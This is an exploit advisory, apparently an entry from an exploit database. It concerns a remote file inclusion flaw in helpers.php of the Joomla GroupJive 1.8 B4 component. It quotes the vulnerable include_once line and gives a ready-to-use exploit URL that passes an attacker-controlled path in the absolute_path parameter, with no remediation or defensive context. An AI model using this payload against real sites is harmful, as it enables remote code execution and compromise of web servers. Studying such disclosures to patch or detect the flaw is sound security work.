id: 9847
date: 09/22/2009
title: Joomla GroupJive 1.8 B4 Remote File Inclusion
author: M3NW5
cves: 

=============================================
Joomla GroupJive 1.8 B4 Remote File Inclusion
=============================================

#############################################################
Joomla Component groupjive 1.8 B4 RFI Vulnerability
#############################################################
Author   : M3NW5
Location : INDONESIA
#############################################################
Achievo 1.3.4 Information
#############################################################
Vendor   : http://www.groupjive.org/
Scripts  : http://forge.joomlapolis.com/projects/list_files/groupjive
File     : helpers.php
       include_once ( $absolute_path . '/components/com_groupjive/compat/array_combine.php' );
Exploit  : http://target.com/components/com_groupjive/helpers.php?absolute_path=<deviL>
#############################################################



#  0day.today [2023-03-25]  #